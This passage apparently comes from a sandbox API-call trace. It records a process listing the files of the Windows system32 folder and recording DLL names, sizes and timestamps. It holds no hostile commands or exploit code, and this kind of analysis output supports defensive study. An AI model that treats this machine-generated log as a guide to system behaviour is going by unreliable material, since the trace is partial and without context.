ftLastWriteTime.dwLowDateTime=0x8cac8250, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0102.700] FindClose (in: hFindFile=0x70a2d8 | out: hFindFile=0x70a2d8) returned 1 [0102.700] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72c918 | out: hHeap=0x6f0000) returned 1 [0102.700] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d0ae615, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6d0ae615, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6d0ae615, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x867, dwReserved0=0x0, dwReserved1=0x0, cFileName="12520437.cpx", cAlternateFileName="")) returned 1 [0102.700] lstrlenW (lpString="12520437.cpx") returned 12 [0102.700] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d0883b6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6d0883b6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6d0883b6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="12520850.cpx", cAlternateFileName="")) returned 1 [0102.700] lstrlenW (lpString="12520850.cpx") returned 12 [0102.701] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e21df53, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6e21df53, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6e21df53, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x134, dwReserved0=0x0, dwReserved1=0x0, cFileName="@AudioToastIcon.png", cAlternateFileName="")) returned 1 [0102.701] lstrlenW (lpString="@AudioToastIcon.png") returned 19 [0102.701] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ba9b10f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ba9b10f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ba9b10f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="@edptoastimage.png", cAlternateFileName="")) returned 1 [0102.701] lstrlenW (lpString="@edptoastimage.png") returned 18 [0102.701] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7442cc99, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7442cc99, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7442cc99, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x14a, dwReserved0=0x0, dwReserved1=0x0, cFileName="@EnrollmentToastIcon.png", cAlternateFileName="")) returned 1 [0102.701] lstrlenW (lpString="@EnrollmentToastIcon.png") returned 24 [0102.701] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72258b18, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x70b27991, ftLastAccessTime.dwHighDateTime=0x1d2fa08, ftLastWriteTime.dwLowDateTime=0x72258b18, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0x0, dwReserved1=0x0, cFileName="@VpnToastIcon.png", cAlternateFileName="")) returned 1 [0102.701] lstrlenW (lpString="@VpnToastIcon.png") returned 17 [0102.701] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c03eb1, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x79c03eb1, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x79c03eb1, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0xf9000, dwReserved0=0x0, dwReserved1=0x0, cFileName="aadtb.dll", cAlternateFileName="")) returned 1 [0102.701] lstrlenW (lpString="aadtb.dll") returned 9 [0102.701] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x94) returned 0x70df40 [0102.702] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x480975a4, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xf31a0f9, ftLastAccessTime.dwHighDateTime=0x1d2fa0c, ftLastWriteTime.dwLowDateTime=0x480975a4, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x3c800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AboveLockAppHost.dll", cAlternateFileName="")) returned 1 [0102.702] lstrlenW (lpString="AboveLockAppHost.dll") returned 20 [0102.702] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xaa) returned 0x72c918 [0102.702] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d2c47ba, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6d2c47ba, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6d2c47ba, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x39f400, dwReserved0=0x0, dwReserved1=0x0, cFileName="accessibilitycpl.dll", cAlternateFileName="")) returned 1 [0102.702] lstrlenW (lpString="accessibilitycpl.dll") returned 20 [0102.702] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xaa) returned 0x72c9d0 [0102.702] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7214da41, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7214da41, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7214da41, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x35800, dwReserved0=0x0, dwReserved1=0x0, cFileName="accountaccessor.dll", cAlternateFileName="")) returned 1 [0102.702] lstrlenW (lpString="accountaccessor.dll") returned 19 [0102.703] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa8) returned 0x72d5b8 [0102.703] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72f299be, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x72f299be, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x72f299be, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x58e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccountsRt.dll", cAlternateFileName="")) returned 1 [0102.703] lstrlenW (lpString="AccountsRt.dll") returned 14 [0102.703] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9e) returned 0x72ea90 [0102.704] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6dfbb8d0, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6dfbb8d0, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6dfbb8d0, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACCTRES.dll", cAlternateFileName="")) returned 1 [0102.704] lstrlenW (lpString="ACCTRES.dll") returned 11 [0102.704] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x72eb38 [0102.704] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a360b87, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6a360b87, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6a360b87, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x0, dwReserved1=0x0, cFileName="acledit.dll", cAlternateFileName="")) returned 1 [0102.704] lstrlenW (lpString="acledit.dll") returned 11 [0102.704] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x72ebd8 [0102.704] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x754914f5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x754914f5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x754b775c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x523000, dwReserved0=0x0, dwReserved1=0x0, cFileName="aclui.dll", cAlternateFileName="")) returned 1 [0102.704] lstrlenW (lpString="aclui.dll") returned 9 [0102.704] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x94) returned 0x72ec78 [0102.704] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b437b24, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6b437b24, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6b437b24, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xb800, dwReserved0=0x0, dwReserved1=0x0, cFileName="acppage.dll", cAlternateFileName="")) returned 1 [0102.704] lstrlenW (lpString="acppage.dll") returned 11 [0102.705] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x72ed18 [0102.705] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7645d3af, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7645d3af, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7645d3af, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x41000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActionCenter.dll", cAlternateFileName="")) returned 1 [0102.705] lstrlenW (lpString="ActionCenter.dll") returned 16 [0102.705] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa2) returned 0x72d928 [0102.705] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7541edc3, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7541edc3, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7541edc3, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x84400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActionCenterCPL.dll", cAlternateFileName="")) returned 1 [0102.705] lstrlenW (lpString="ActionCenterCPL.dll") returned 19 [0102.705] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa8) returned 0x72db38 [0102.705] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x743942fc, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x743942fc, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x743942fc, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x6c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActivationClient.dll", cAlternateFileName="")) returned 1 [0102.705] lstrlenW (lpString="ActivationClient.dll") returned 20 [0102.705] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xaa) returned 0x72edb8 [0102.705] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c50346, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x79c50346, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x79c50346, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x57600, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActivationManager.dll", cAlternateFileName="")) returned 1 [0102.705] lstrlenW (lpString="ActivationManager.dll") returned 21 [0102.706] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xac) returned 0x72ee70 [0102.706] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d0883b6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6d0883b6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6d0883b6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x36200, dwReserved0=0x0, dwReserved1=0x0, cFileName="activeds.dll", cAlternateFileName="")) returned 1 [0102.706] lstrlenW (lpString="activeds.dll") returned 12 [0102.706] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x72ef28 [0102.706] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d0883b6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6d0883b6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6d0883b6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1b600, dwReserved0=0x0, dwReserved1=0x0, cFileName="activeds.tlb", cAlternateFileName="")) returned 1 [0102.706] lstrlenW (lpString="activeds.tlb") returned 12 [0102.706] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51445ef8, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x10e12b86, ftLastAccessTime.dwHighDateTime=0x1d2fa0c, ftLastWriteTime.dwLowDateTime=0x51445ef8, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x16cc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActiveSyncProvider.dll", cAlternateFileName="")) returned 1 [0102.706] lstrlenW (lpString="ActiveSyncProvider.dll") returned 22 [0102.706] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xae) returned 0x72efd0 [0102.707] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b51c987, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6b51c987, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6b51c987, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3f800, dwReserved0=0x0, dwReserved1=0x0, cFileName="actxprxy.dll", cAlternateFileName="")) returned 1 [0102.707] lstrlenW (lpString="actxprxy.dll") returned 12 [0102.707] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x72f088 [0102.707] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7220c641, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7220c641, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7220c641, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddressParser.dll", cAlternateFileName="")) returned 1 [0102.707] lstrlenW (lpString="AddressParser.dll") returned 17 [0102.707] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa4) returned 0x72d458 [0102.707] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c750f74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd3a628bd, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd3a628bd, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x6d600, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdmTmpl.dll", cAlternateFileName="")) returned 1 [0102.707] lstrlenW (lpString="AdmTmpl.dll") returned 11 [0102.707] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x72f130 [0102.707] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cfefa58, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6cfefa58, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6cfefa58, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="adprovider.dll", cAlternateFileName="")) returned 1 [0102.707] lstrlenW (lpString="adprovider.dll") returned 14 [0102.707] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9e) returned 0x72f1d0 [0102.708] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78d7eb03, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd0b515ed, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd0b515ed, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x18400, dwReserved0=0x0, dwReserved1=0x0, cFileName="adrclient.dll", cAlternateFileName="")) returned 1 [0102.708] lstrlenW (lpString="adrclient.dll") returned 13 [0102.708] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9c) returned 0x72f278 [0102.708] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cf7d30b, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6cf7d30b, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6cf7d30b, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x32200, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsldp.dll", cAlternateFileName="")) returned 1 [0102.708] lstrlenW (lpString="adsldp.dll") returned 10 [0102.708] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x96) returned 0x72f320 [0102.708] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d06214f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6d06214f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6d06214f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x35400, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsldpc.dll", cAlternateFileName="")) returned 1 [0102.708] lstrlenW (lpString="adsldpc.dll") returned 11 [0102.708] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x72f3c0 [0102.708] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cfefa58, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6cfefa58, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6cfefa58, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x15a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsmsext.dll", cAlternateFileName="")) returned 1 [0102.708] lstrlenW (lpString="adsmsext.dll") returned 12 [0102.708] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x72f460 [0102.708] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d06214f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6d06214f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6d06214f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x47600, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsnt.dll", cAlternateFileName="")) returned 1 [0102.709] lstrlenW (lpString="adsnt.dll") returned 9 [0102.709] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x94) returned 0x72f508 [0102.709] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e0ecc09, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6e0ecc09, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6e112e71, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xca000, dwReserved0=0x0, dwReserved1=0x0, cFileName="adtschema.dll", cAlternateFileName="")) returned 1 [0102.709] lstrlenW (lpString="adtschema.dll") returned 13 [0102.710] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9c) returned 0x72f5a8 [0102.710] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xffb180b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2021b83b, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdvancedInstallers", cAlternateFileName="ADVANC~1")) returned 1 [0102.710] lstrlenW (lpString="AdvancedInstallers") returned 18 [0102.710] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x72f650 [0102.710] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\AdvancedInstallers\\*", lpFindFileData=0x72f650 | out: lpFindFileData=0x72f650*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xffb180b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2021b83b, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70a058 [0102.711] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x72f650 | out: lpFindFileData=0x72f650*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xffb180b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2021b83b, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.711] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x72f650 | out: lpFindFileData=0x72f650*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c154e8c, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6c154e8c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6c154e8c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1f3ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cmiv2.dll", cAlternateFileName="")) returned 1 [0102.711] lstrlenW (lpString="cmiv2.dll") returned 9 [0102.711] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xba) returned 0x7308b0 [0102.711] FindNextFileW (in: hFindFile=0x70a058, lpFindFileData=0x72f650 | out: lpFindFileData=0x72f650*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c154e8c, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6c154e8c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6c154e8c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1f3ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cmiv2.dll", cAlternateFileName="")) returned 0 [0102.712] FindClose (in: hFindFile=0x70a058 | out: hFindFile=0x70a058) returned 1 [0102.712] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x72f650 | out: hHeap=0x6f0000) returned 1 [0102.712] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b4118b5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6b4118b5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, 